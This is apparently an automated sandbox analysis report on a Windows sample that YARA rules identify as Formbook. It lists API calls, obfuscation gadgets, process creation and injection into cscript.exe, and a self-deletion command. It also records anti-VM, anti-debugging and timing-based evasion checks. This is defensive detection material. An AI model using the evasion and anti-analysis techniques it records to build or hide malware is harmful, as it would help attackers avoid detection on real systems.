Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9950 NtQueueApcThread, 9_2_047B9950
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047BAD30 NtSetContextThread, 9_2_047BAD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9520 NtWaitForSingleObject, 9_2_047B9520
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B95F0 NtQueryInformationFile, 9_2_047B95F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B99D0 NtCreateProcessEx, 9_2_047B99D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9670 NtQueryInformationProcess, 9_2_047B9670
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9A20 NtResumeThread, 9_2_047B9A20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9610 NtEnumerateValueKey, 9_2_047B9610
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9A10 NtQuerySection, 9_2_047B9A10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9A00 NtProtectVirtualMemory, 9_2_047B9A00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9A80 NtOpenDirectoryObject, 9_2_047B9A80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047BA770 NtOpenThread, 9_2_047BA770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9770 NtSetInformationFile, 9_2_047B9770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9760 NtOpenProcess, 9_2_047B9760
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9730 NtQueryVirtualMemory, 9_2_047B9730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047BA710 NtOpenProcessToken, 9_2_047BA710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9B00 NtSetValueKey, 9_2_047B9B00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047BA3B0 NtGetContextThread, 9_2_047BA3B0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B97A0 NtUnmapViewOfSection, 9_2_047B97A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02788280 NtReadFile, 9_2_02788280
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02788300 NtClose, 9_2_02788300
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_027883B0 NtAllocateVirtualMemory, 9_2_027883B0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_027881D0 NtCreateFile, 9_2_027881D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02788222 NtCreateFile, 9_2_02788222
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_027883AA NtAllocateVirtualMemory, 9_2_027883AA
Detected potential crypto function
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0040102E 2_2_0040102E
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0041B8FB 2_2_0041B8FB
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00408C6C 2_2_00408C6C
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00408C70 2_2_00408C70
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0041B57A 2_2_0041B57A
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00402D88 2_2_00402D88
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0041C58A 2_2_0041C58A
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478841F 9_2_0478841F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831002 9_2_04831002
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478B090 9_2_0478B090
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04770D20 9_2_04770D20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04794120 9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477F900 9_2_0477F900
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478D5E0 9_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04841D55 9_2_04841D55
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04796E30 9_2_04796E30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AEBB0 9_2_047AEBB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0278B8FB 9_2_0278B8FB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02772FB0 9_2_02772FB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02778C70 9_2_02778C70
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02778C6C 9_2_02778C6C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0278B57A 9_2_0278B57A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02772D90 9_2_02772D90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0278C58A 9_2_0278C58A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02772D88 9_2_02772D88
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0477B150 appears 32 times
Sample file is different than original file name gathered from version info
Source: 85vLO1Rpcy.exe, 00000001.00000003.655654489.000000000239F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 85vLO1Rpcy.exe
Source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamecscript.exe` vs 85vLO1Rpcy.exe
Source: 85vLO1Rpcy.exe, 00000002.00000002.718870614.0000000000C0F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 85vLO1Rpcy.exe
Uses 32bit PE files
Source: 85vLO1Rpcy.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Yara signature match
Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/0@12/8
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
Source: 85vLO1Rpcy.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 85vLO1Rpcy.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe File read: C:\Users\user\Desktop\85vLO1Rpcy.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe' Jump to behavior
Source: Binary string: cscript.pdbUGP source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 85vLO1Rpcy.exe, 00000001.00000003.654242589.00000000020F0000.00000004.00000001.sdmp, 85vLO1Rpcy.exe, 00000002.00000002.718159413.0000000000960000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 85vLO1Rpcy.exe, cscript.exe
Source: Binary string: cscript.pdb source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Unpacked PE file: 2.2.85vLO1Rpcy.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_004062F6 pushfd ; ret 2_2_004062F7
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0041B3C5 push eax; ret 2_2_0041B418
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_004153FC push eax; retf 2_2_0041540B
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0041B47C push eax; ret 2_2_0041B482
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0041B412 push eax; ret 2_2_0041B418
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0041B41B push eax; ret 2_2_0041B482
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00415CE7 pushad ; ret 2_2_00415D4B
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_0041C4EE push 133511A3h; retf 2_2_0041C4F3
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00414D71 push ss; iretd 2_2_00414D72
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00415D38 pushad ; ret 2_2_00415D4B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047CD0D1 push ecx; ret 9_2_047CD0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_027762F6 pushfd ; ret 9_2_027762F7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_027853FC push eax; retf 9_2_0278540B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0278B3C5 push eax; ret 9_2_0278B418
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0278B47C push eax; ret 9_2_0278B482
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0278B41B push eax; ret 9_2_0278B482
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0278B412 push eax; ret 9_2_0278B418
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0278C4EE push 133511A3h; retf 9_2_0278C4F3
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02785CE7 pushad ; ret 9_2_02785D4B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02784D71 push ss; iretd 9_2_02784D72
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_02785D38 pushad ; ret 9_2_02785D4B
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 00000000027785F4 second address: 00000000027785FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 000000000277898E second address: 0000000002778994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 4596 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 6704 Thread sleep time: -42000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
Source: explorer.exe, 00000005.00000000.689554212.000000000FCDF000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.689491602.000000000FCA3000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000005.00000000.684592280.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.679024096.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.684592280.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.685546854.000000000A9D4000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA}
Source: explorer.exe, 00000005.00000000.674530269.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.684746061.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.684825933.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00409B30 LdrLoadDll, 2_2_00409B30
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 1_2_020706DA mov eax, dword ptr fs:[00000030h] 1_2_020706DA
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 1_2_0207099F mov eax, dword ptr fs:[00000030h] 1_2_0207099F
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 1_2_020709DE mov eax, dword ptr fs:[00000030h] 1_2_020709DE
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 1_2_02070A1C mov eax, dword ptr fs:[00000030h] 1_2_02070A1C
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 1_2_020708EE mov eax, dword ptr fs:[00000030h] 1_2_020708EE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479746D mov eax, dword ptr fs:[00000030h] 9_2_0479746D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04790050 mov eax, dword ptr fs:[00000030h] 9_2_04790050
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04790050 mov eax, dword ptr fs:[00000030h] 9_2_04790050
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480B8D0 mov ecx, dword ptr fs:[00000030h] 9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04848CD6 mov eax, dword ptr fs:[00000030h] 9_2_04848CD6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h] 9_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h] 9_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h] 9_2_0478B02A
